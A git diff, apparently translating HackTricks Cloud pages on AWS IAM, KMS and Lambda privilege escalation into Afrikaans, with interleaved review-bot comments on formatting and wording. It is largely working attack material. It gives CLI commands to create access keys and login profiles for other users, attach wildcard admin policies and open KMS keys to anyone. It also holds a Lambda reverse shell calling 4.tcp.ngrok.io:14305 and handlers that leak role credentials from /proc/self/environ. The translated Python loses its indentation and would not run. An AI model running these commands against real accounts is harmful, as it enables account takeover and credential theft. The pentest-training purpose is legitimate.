Indirect privilege escalation by enabling more permissions. +**Impak:** Indirekte privilige-escalasie deur meer toestemmings te aktiveer. ### **`iam:CreateAccessKey`** -Enables creating access key ID and secret access key for another user, leading to potential privilege escalation. - -**Exploit:** +Aktiveer die skep van toegangsleutel-ID en geheime toegangsleutel vir 'n ander gebruiker, wat kan lei tot potensiĂ«le privilige-escalasie. 
+**Eksploiteer:** ```bash aws iam create-access-key --user-name ``` - -**Impact:** Direct privilege escalation by assuming another user's extended permissions. +**Impak:** Direkte privilege-eskalasie deur 'n ander gebruiker se uitgebreide toestemmings aan te neem. ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`** -Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation. - -**Exploit for Creation:** +Stel die skep of opdatering van 'n aanmeldprofiel toe, insluitend die instelling van wagwoorde vir AWS-konsol aanmelding, wat lei tot direkte privilege-eskalasie. +**Eksploiteer vir Skepping:** ```bash aws iam create-login-profile --user-name target_user --no-password-reset-required \ - --password '' +--password '' ``` - -**Exploit for Update:** - +**Eksploiteer vir Opdatering:** ```bash aws iam update-login-profile --user-name target_user --no-password-reset-required \ - --password '' +--password '' ``` - -**Impact:** Direct privilege escalation by logging in as "any" user. +**Impak:** Direkte privilige-escalasie deur in te log as "enige" gebruiker. ### **`iam:UpdateAccessKey`** -Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key. - -**Exploit:** +Laat toe om 'n gedeaktiveerde toegangsleutel te aktiveer, wat moontlik kan lei tot ongemagtigde toegang as die aanvaller die gedeaktiveerde sleutel besit. +**Eksploiteer:** ```bash aws iam update-access-key --access-key-id --status Active --user-name ``` - -**Impact:** Direct privilege escalation by reactivating access keys. +**Impak:** Direkte privilige-escalasie deur toegangssleutels te heraktiveer. ### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`** -Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces), inheriting the permissions of the associated user. 
- -**Exploit for Creation:** +Stel die generering of reset van kredensiale vir spesifieke AWS-dienste (bv. CodeCommit, Amazon Keyspaces) in, wat die toestemmings van die geassosieerde gebruiker erf. +**Eksploiteer vir Skepping:** ```bash aws iam create-service-specific-credential --user-name --service-name ``` - -**Exploit for Reset:** - +**Eksploiteer vir Herstel:** ```bash aws iam reset-service-specific-credential --service-specific-credential-id ``` - -**Impact:** Direct privilege escalation within the user's service permissions. +**Impak:** Direkte privilige-escalasie binne die gebruiker se diens toestemmings. ### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`** -Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy. - -**Exploit for User:** +Stel in staat om beleide aan gebruikers of groepe te heg, wat direk privilige verhoog deur die toestemmings van die gehegte beleid te erf. +**Eksploiteer vir Gebruiker:** ```bash aws iam attach-user-policy --user-name --policy-arn "" ``` - -**Exploit for Group:** - +**Eksploiteer vir Groep:** ```bash aws iam attach-group-policy --group-name --policy-arn "" ``` - -**Impact:** Direct privilege escalation to anything the policy grants. +**Impak:** Direkte privilege-escalasie na enigiets wat die beleid toelaat. ### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`** -Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions. - -**Exploit for Role:** +Stel die aanhegting of plasing van beleide aan rolle, gebruikers of groepe toe, wat direkte privilege-escalasie moontlik maak deur addisionele toestemmings te verleen. 
+**Eksploiteer vir Rol:** ```bash aws iam attach-role-policy --role-name --policy-arn "" ``` - -**Exploit for Inline Policies:** - +**Eksploiteer vir Inline Beleide:** ```bash aws iam put-user-policy --user-name --policy-name "" \ - --policy-document "file:///path/to/policy.json" +--policy-document "file:///path/to/policy.json" aws iam put-group-policy --group-name --policy-name "" \ - --policy-document file:///path/to/policy.json +--policy-document file:///path/to/policy.json aws iam put-role-policy --role-name --policy-name "" \ - --policy-document file:///path/to/policy.json +--policy-document file:///path/to/policy.json ``` - -You can use a policy like: - +U kan 'n beleid soos gebruik: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": ["*"], - "Resource": ["*"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": ["*"], +"Resource": ["*"] +} +] } ``` - -**Impact:** Direct privilege escalation by adding permissions through policies. +**Impak:** Direkte privilige-escalasie deur die toevoeging van toestemmings deur beleid. ### **`iam:AddUserToGroup`** -Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions. - -**Exploit:** +Stel in staat om jouself by 'n IAM-groep te voeg, wat privilige-escalasie moontlik maak deur die groep se toestemmings te erf. +**Eksploiteer:** ```bash aws iam add-user-to-group --group-name --user-name ``` - -**Impact:** Direct privilege escalation to the level of the group's permissions. +**Impak:** Direkte privilige-escalasie na die vlak van die groep se toestemmings. ### **`iam:UpdateAssumeRolePolicy`** -Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions. - -**Exploit:** +Stel in staat om die aanneemrolbeleid dokument van 'n rol te verander, wat die aanneming van die rol en sy geassosieerde toestemmings moontlik maak. 
+**Eksploiteer:** ```bash aws iam update-assume-role-policy --role-name \ - --policy-document file:///path/to/assume/role/policy.json +--policy-document file:///path/to/assume/role/policy.json ``` - -Where the policy looks like the following, which gives the user permission to assume the role: - +Waar die beleid soos die volgende lyk, wat die gebruiker toestemming gee om die rol aan te neem: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "sts:AssumeRole", - "Principal": { - "AWS": "$USER_ARN" - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "sts:AssumeRole", +"Principal": { +"AWS": "$USER_ARN" +} +} +] } ``` - -**Impact:** Direct privilege escalation by assuming any role's permissions. +**Impak:** Direkte privilige-escalasie deur enige rol se toestemmings aan te neem. ### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`** -Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation. - -**Exploit for SSH Key Upload:** +Toelaat om 'n SSH publieke sleutel op te laai vir outentisering by CodeCommit en om MFA toestelle te deaktiveer, wat kan lei tot potensiĂ«le indirekte privilige-escalasie. +**Eksploiteer vir SSH Sleutel Oplaai:** ```bash aws iam upload-ssh-public-key --user-name --ssh-public-key-body ``` - -**Exploit for MFA Deactivation:** - +**Eksploiteer vir MFA Deaktivering:** ```bash aws iam deactivate-mfa-device --user-name --serial-number ``` - -**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection. +**Impak:** Indirekte privilige-escalasie deur CodeCommit-toegang te aktiveer of MFA-beskerming te deaktiveer. ### **`iam:ResyncMFADevice`** -Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection. 
- -**Bash Command:** +Stel die her-synchronisasie van 'n MFA-toestel toe, wat moontlik kan lei tot indirekte privilige-escalasie deur MFA-beskerming te manipuleer. +**Bash-opdrag:** ```bash aws iam resync-mfa-device --user-name --serial-number \ - --authentication-code1 --authentication-code2 +--authentication-code1 --authentication-code2 ``` - -**Impact:** Indirect privilege escalation by adding or manipulating MFA devices. +**Impak:** Indirekte privilige-escalasie deur MFA-toestelle by te voeg of te manipuleer. ### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`) -With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it. - -Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back +Met hierdie toestemmings kan jy **die XML-metadata van die SAML-verbinding verander**. Dan kan jy die **SAML-federasie** misbruik om **in te log** met enige **rol wat dit vertrou**. +Let daarop dat legitieme gebruikers nie in staat sal wees om in te log nie. Jy kan egter die XML kry, sodat jy joune kan plaas, inlog en die vorige weer kan konfigureer. ```bash # List SAMLs aws iam list-saml-providers 
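Review bot: in the first hunk of `aws-iam-privesc.md`, the two policy JSON documents (the `"Action": ["*"]` policy and the `sts:AssumeRole` trust policy) lose all their indentation in the `+` lines although only the prose around them is being translated; keep the original two-space indentation so the documents stay readable. The bold on the SAML side effect ("legit users won't be able to login") is also dropped in `+Let daarop dat legitieme gebruikers nie in staat sal wees om in te log nie.`; keep the emphasis, since that outage is the operational consequence a reader should notice. Two wording points: 'privilige-escalasie' is misspelled (Afrikaans 'privilege', or 'voorreg' as the lambda file in this same PR uses), and `U kan 'n beleid soos gebruik:` drops the object of 'soos' (`U kan 'n beleid soos die volgende gebruik:`).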
@@ -249,14 +210,12 @@ aws iam update-saml-provider --saml-metadata-document --saml-provider-ar # Optional: Set the previous XML back aws iam update-saml-provider --saml-metadata-document --saml-provider-arn ``` - > [!NOTE] -> TODO: A Tool capable of generating the SAML metadata and login with a specified role +> TODO: 'n Gereedskap wat in staat is om die SAML metadata te genereer en aan te meld met 'n gespesifiseerde rol ### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**) -(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider. - +(Onseker oor dit) As 'n aanvaller hierdie **toestemmings** het, kan hy 'n nuwe **Thumbprint** byvoeg om in te log in al die rolle wat die verskaffer vertrou. ```bash # List providers aws iam list-open-id-connect-providers @@ -265,13 +224,8 @@ aws iam get-open-id-connect-provider --open-id-connect-provider-arn # Update Thumbprints (The thumbprint is always a 40-character string) aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3 ``` - -## References +## Verwysings - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md index 02c05b76d..1f7618a6f 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md @@ -4,7 +4,7 @@ ## KMS -For more info about KMS check: +Vir meer inligting oor KMS, kyk: {{#ref}} ../aws-services/aws-kms-enum.md 
@@ -12,8 +12,7 @@ For more info about KMS check: ### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) -With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: - +Met hierdie toestemmings is dit moontlik om **die toegangstoestemmings tot die sleutel te wysig** sodat dit deur ander rekeninge of selfs enigiemand gebruik kan word: ```bash aws kms list-keys aws kms list-key-policies --key-id # Although only 1 max per key 
@@ -21,106 +20,91 @@ aws kms get-key-policy --key-id --policy-name # AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json ``` - -policy.json: - +beleid.json: ```json { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow all use", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": ["kms:*"], - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow all use", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": ["kms:*"], +"Resource": "*" +} +] } ``` - ### `kms:CreateGrant` -It **allows a principal to use a KMS key:** - +Dit **laat 'n hoof gebruik maak van 'n KMS-sleutel:** ```bash aws kms create-grant \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ - --operations Decrypt +--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ +--grantee-principal arn:aws:iam::123456789012:user/exampleUser \ +--operations Decrypt ``` +> [!WARNING] +> 'n Toekenning kan slegs sekere tipes operasies toelaat: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) > [!WARNING] -> A grant can only allow certain types of operations: 
[https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) - -> [!WARNING] -> Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\ -> However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ -> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). - +> Let daarop dat dit 'n paar minute kan neem voordat KMS **die gebruiker toelaat om die sleutel te gebruik nadat die toekenning gegenereer is**. Sodra daardie tyd verby is, kan die hoofpersoon die KMS-sleutel gebruik sonder om iets spesifiek aan te dui.\ +> As dit egter nodig is om die toekenning onmiddellik te gebruik [gebruik 'n toekenningstoken](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (kyk na die volgende kode).\ +> Vir [**meer inligting lees dit**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). ```bash # Use the grant token in a request aws kms generate-data-key \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - –-key-spec AES_256 \ - --grant-tokens $token +--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ +–-key-spec AES_256 \ +--grant-tokens $token ``` - -Note that it's possible to list grant of keys with: - +Let daarop dat dit moontlik is om die toekennings van sleutels te lys met: ```bash aws kms list-grants --key-id ``` - ### `kms:CreateKey`, `kms:ReplicateKey` -With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. 
- -So, an attacker could abuse this to obtain privesc his access to the key and use it +Met hierdie toestemmings is dit moontlik om 'n multi-region geaktiveerde KMS-sleutel in 'n ander streek met 'n ander beleid te repliseer. +So, 'n aanvaller kan dit misbruik om privesc sy toegang tot die sleutel te verkry en dit te gebruik. ```bash aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "kms:*", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "kms:*", +"Resource": "*" +} +] } ``` - ### `kms:Decrypt` -This permission allows to use a key to decrypt some information.\ -For more information check: +Hierdie toestemming laat toe om 'n sleutel te gebruik om sekere inligting te ontsleutel.\ +Vir meer inligting, kyk: {{#ref}} ../aws-post-exploitation/aws-kms-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md index d276ef737..0f9a5c240 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md @@ -4,7 +4,7 @@ ## lambda -More info about lambda in: +Meer inligting oor lambda in: {{#ref}} ../aws-services/aws-lambda-enum.md 
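Review bot: in the `@@ -21,106 +20,91 @@` hunk of `aws-kms-privesc.md`, the label `policy.json:` became `beleid.json:`, but the command just above still passes `file:///tmp/policy.json`; file names are identifiers and must stay untranslated. The new `> [!WARNING]` callout is inserted directly above the retained context line `> [!WARNING]` with the blank line between them removed, so the two callouts merge into one blockquote and the second `[!WARNING]` renders as plain text; add a blank line between them. The `generate-data-key` example still carries `–-key-spec AES_256` with an en dash, which the CLI rejects; since those lines are being rewritten anyway, change it to `--key-spec AES_256`. Finally, 'hoof' and 'hoofpersoon' are both used for 'principal'; the IAM term 'principal' is best left as is.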
@@ -12,23 +12,22 @@ More info about lambda in: ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`) -Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\ -They can **create a new Lambda function and assign it an existing IAM role**, granting the function the permissions associated with that role. The user can then **write and upload code to this Lambda function (with a rev shell for example)**.\ -Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.\\ - -A attacker could abuse this to get a **rev shell and steal the token**: +Gebruikers met die **`iam:PassRole`, `lambda:CreateFunction`, en `lambda:InvokeFunction`** toestemmings kan hul voorregte verhoog.\ +Hulle kan **'n nuwe Lambda-funksie skep en dit 'n bestaande IAM-rol toewys**, wat die funksie die toestemmings verleen wat met daardie rol geassosieer word. Die gebruiker kan dan **kode na hierdie Lambda-funksie skryf en oplaai (met 'n rev shell byvoorbeeld)**.\ +Sodra die funksie opgestel is, kan die gebruiker **die uitvoering daarvan aktiveer** en die beoogde aksies deur die Lambda-funksie via die AWS API aan te roep. 
Hierdie benadering stel die gebruiker effektief in staat om take indirek deur die Lambda-funksie uit te voer, werkend met die toegangsvlak wat aan die IAM-rol geassosieer is.\\ +'n Aanvaller kan dit misbruik om 'n **rev shell te kry en die token te steel**: ```python:rev.py import socket,subprocess,os,time def lambda_handler(event, context): - s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); - s.connect(('4.tcp.ngrok.io',14305)) - os.dup2(s.fileno(),0) - os.dup2(s.fileno(),1) - os.dup2(s.fileno(),2) - p=subprocess.call(['/bin/sh','-i']) - time.sleep(900) - return 0 +s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); +s.connect(('4.tcp.ngrok.io',14305)) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +p=subprocess.call(['/bin/sh','-i']) +time.sleep(900) +return 0 ``` ```bash @@ -37,8 +36,8 @@ zip "rev.zip" "rev.py" # Create the function aws lambda create-function --function-name my_function \ - --runtime python3.9 --role \ - --handler rev.lambda_handler --zip-file fileb://rev.zip +--runtime python3.9 --role \ +--handler rev.lambda_handler --zip-file fileb://rev.zip # Invoke the function aws lambda invoke --function-name my_function output.txt 
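Review bot: in the `@@ -12,23 +12,22 @@` hunk of `aws-lambda-privesc.md`, the `+` lines strip the indentation from the body of `lambda_handler` in `rev.py` (`+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);` now sits at column 0 directly under `def lambda_handler(event, context):`), which is a SyntaxError in Python; restore the four-space indentation. Dedenting the shell continuation lines (`+--runtime python3.9 --role \`) is harmless, but the Python block no longer runs as published.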
@@ -47,99 +46,83 @@ aws lambda invoke --function-name my_function output.txt # List roles aws iam list-attached-user-policies --user-name ``` - -You could also **abuse the lambda role permissions** from the lambda function itself.\ -If the lambda role had enough permissions you could use it to grant admin rights to you: - +U kan ook **misbruik maak van die lambda rol toestemmings** vanaf die lambda funksie self.\ +As die lambda rol genoeg toestemmings gehad het, kan u dit gebruik om admin regte aan u toe te ken: ```python import boto3 def lambda_handler(event, context): - client = boto3.client('iam') - response = client.attach_user_policy( - UserName='my_username', - PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' - ) - return response +client = boto3.client('iam') +response = client.attach_user_policy( +UserName='my_username', +PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' +) +return response ``` - -It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda. - +Dit is ook moontlik om die lambda se rol geloofsbriewe te lek sonder om 'n eksterne verbinding te benodig. Dit sou nuttig wees vir **Network isolated Lambdas** wat op interne take gebruik word. As daar onbekende sekuriteitsgroepe is wat jou omgekeerde skulpies filter, sal hierdie stuk kode jou toelaat om die geloofsbriewe direk as die uitvoer van die lambda te lek. 
```python def handler(event, context): -    sessiontoken = open('/proc/self/environ', "r").read() -    return { -        'statusCode': 200, -        'session': str(sessiontoken) -    } +sessiontoken = open('/proc/self/environ', "r").read() +return { +'statusCode': 200, +'session': str(sessiontoken) +} ``` ```bash aws lambda invoke --function-name output.txt cat output.txt ``` - -**Potential Impact:** Direct privesc to the arbitrary lambda service role specified. +**PotensiĂ«le Impak:** Direkte privesc na die arbitrĂȘre lambda diensrol wat gespesifiseer is. > [!CAUTION] -> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction` +> Let daarop dat selfs al lyk dit interessant **`lambda:InvokeAsync`** **nie** op sy eie toelaat om **`aws lambda invoke-async`** uit te voer nie, jy het ook `lambda:InvokeFunction` nodig. ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission` -Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`** - +Soos in die vorige scenario, kan jy **jouself die `lambda:InvokeFunction`** toestemming gee as jy die toestemming **`lambda:AddPermission`** het. ```bash # Check the previous exploit and use the following line to grant you the invoke permissions aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \ - --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN" +--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN" ``` - -**Potential Impact:** Direct privesc to the arbitrary lambda service role specified. +**PotensiĂ«le Impak:** Direkte privesc na die arbitrĂȘre lambda diensrol wat gespesifiseer is. 
### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping` -Users with **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions (and potentially `dynamodb:PutItem` and `dynamodb:CreateTable`) can indirectly **escalate privileges** even without `lambda:InvokeFunction`.\ -They can create a **Lambda function with malicious code and assign it an existing IAM role**. - -Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role. +Gebruikers met **`iam:PassRole`, `lambda:CreateFunction`, en `lambda:CreateEventSourceMapping`** toestemmings (en moontlik `dynamodb:PutItem` en `dynamodb:CreateTable`) kan indirek **privileges verhoog** selfs sonder `lambda:InvokeFunction`.\ +Hulle kan 'n **Lambda-funksie met kwaadwillige kode skep en dit aan 'n bestaande IAM-rol toewys**. +In plaas daarvan om die Lambda direk aan te roep, stel die gebruiker 'n bestaande DynamoDB-tabel op of gebruik dit, en koppel dit aan die Lambda deur middel van 'n gebeurtenisbron-mapping. Hierdie opstelling verseker dat die Lambda-funksie **automaties geaktiveer word wanneer 'n nuwe item** in die tabel ingevoer word, hetsy deur die gebruiker se aksie of 'n ander proses, en roep dus indirek die Lambda-funksie aan en voer die kode uit met die toestemmings van die oorgedraagde IAM-rol. 
```bash aws lambda create-function --function-name my_function \ - --runtime python3.8 --role \ - --handler lambda_function.lambda_handler \ - --zip-file fileb://rev.zip +--runtime python3.8 --role \ +--handler lambda_function.lambda_handler \ +--zip-file fileb://rev.zip ``` - -If DynamoDB is already active in the AWS environment, the user only **needs to establish the event source mapping** for the Lambda function. However, if DynamoDB isn't in use, the user must **create a new table** with streaming enabled: - +As DynamoDB reeds aktief is in die AWS-omgewing, moet die gebruiker net **die gebeurtenisbronkaart** vir die Lambda-funksie opstel. As DynamoDB egter nie in gebruik is nie, moet die gebruiker **nuwe tabel** met streaming geaktiveer skep: ```bash aws dynamodb create-table --table-name my_table \ - --attribute-definitions AttributeName=Test,AttributeType=S \ - --key-schema AttributeName=Test,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES +--attribute-definitions AttributeName=Test,AttributeType=S \ +--key-schema AttributeName=Test,KeyType=HASH \ +--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ +--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES ``` - -Now it's posible **connect the Lambda function to the DynamoDB table** by **creating an event source mapping**: - +Nou is dit moontlik **om die Lambda-funksie aan die DynamoDB-tabel te koppel** deur **'n gebeurtenisbronkaart te skep**: ```bash aws lambda create-event-source-mapping --function-name my_function \ - --event-source-arn \ - --enabled --starting-position LATEST +--event-source-arn \ +--enabled --starting-position LATEST ``` - -With the Lambda function linked to the DynamoDB stream, the attacker can **indirectly trigger the Lambda by activating the DynamoDB stream**. 
This can be accomplished by **inserting an item** into the DynamoDB table: - +Met die Lambda-funksie wat aan die DynamoDB-stroom gekoppel is, kan die aanvaller **indirek die Lambda aktiveer deur die DynamoDB-stroom te aktiveer**. Dit kan bereik word deur **'n item in die DynamoDB-tabel in te voeg**: ```bash aws dynamodb put-item --table-name my_table \ - --item Test={S="Random string"} +--item Test={S="Random string"} ``` - -**Potential Impact:** Direct privesc to the lambda service role specified. +**PotensiĂ«le Impak:** Direkte privesc na die lambda diensrol gespesifiseer. ### `lambda:AddPermission` -An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource): - +'n Aanvaller met hierdie toestemming kan **homself (of ander) enige toestemmings gee** (dit genereer hulpbron-gebaseerde beleide om toegang tot die hulpbron te verleen): ```bash # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode) aws lambda add-permission --function-name --statement-id asdasd --action '*' --principal arn: 
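Review bot: in the `@@ -47,99 +46,83 @@` hunk, both Python handlers (the `boto3` `attach_user_policy` one and the `/proc/self/environ` one) lose their body indentation in the `+` lines, so `+client = boto3.client('iam')` and `+sessiontoken = open('/proc/self/environ', "r").read()` directly follow a `def` line and neither block parses; restore the indentation as for `rev.py`. Wording: 'omgekeerde skulpies' is a literal rendering of 'reverse shells' (elsewhere this PR keeps 'rev shell'), the same construct is translated as 'gebeurtenisbron-mapping' in one paragraph and 'gebeurtenisbronkaart' in the next, and `moet die gebruiker **nuwe tabel** met streaming geaktiveer skep` is missing the article ('n nuwe tabel).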
@@ -147,51 +130,44 @@ aws lambda add-permission --function-name --statement-id asdasd --ac # Invoke the function aws lambda invoke --function-name /tmp/outout ``` - -**Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it. +**PotensiĂ«le Impak:** Direkte privesc na die lambda diensrol wat gebruik word deur toestemming te gee om die kode te wysig en dit uit te voer. ### `lambda:AddLayerVersionPermission` -An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information - +'n Aanvaller met hierdie toestemming kan **homself (of ander) die toestemming `lambda:GetLayerVersion` gee**. Hy kan toegang tot die laag verkry en soek na kwesbaarhede of sensitiewe inligting. ```bash # Give everyone the permission lambda:GetLayerVersion aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion ``` - -**Potential Impact:** Potential access to sensitive information. +**PotensiĂ«le Impak:** PotensiĂ«le toegang tot sensitiewe inligting. ### `lambda:UpdateFunctionCode` -Users holding the **`lambda:UpdateFunctionCode`** permission has the potential to **modify the code of an existing Lambda function that is linked to an IAM role.**\ -The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**. - -Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code. 
+Gebruikers wat die **`lambda:UpdateFunctionCode`** toestemming het, het die potensiaal om die **kode van 'n bestaande Lambda-funksie wat aan 'n IAM-rol gekoppel is, te wysig.**\ +Die aanvaller kan **die kode van die lambda wysig om die IAM-akkrediteerings te eksfiltreer**. +Alhoewel die aanvaller dalk nie die direkte vermoĂ« het om die funksie aan te roep nie, as die Lambda-funksie reeds bestaan en operasioneel is, is dit waarskynlik dat dit geaktiveer sal word deur bestaande werksvloei of gebeurtenisse, wat indirek die uitvoering van die gewysigde kode fasiliteer. ```bash # The zip should contain the lambda code (trick: Download the current one and add your code there) aws lambda update-function-code --function-name target_function \ - --zip-file fileb:///my/lambda/code/zipped.zip +--zip-file fileb:///my/lambda/code/zipped.zip # If you have invoke permissions: aws lambda invoke --function-name my_function output.txt # If not check if it's exposed in any URL or via an API gateway you could access ``` - -**Potential Impact:** Direct privesc to the lambda service role used. +**PotensiĂ«le Impak:** Direkte privesc na die lambda diensrol wat gebruik word. ### `lambda:UpdateFunctionConfiguration` -#### RCE via env variables - -With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands: +#### RCE via omgewing veranderlikes +Met hierdie toestemmings is dit 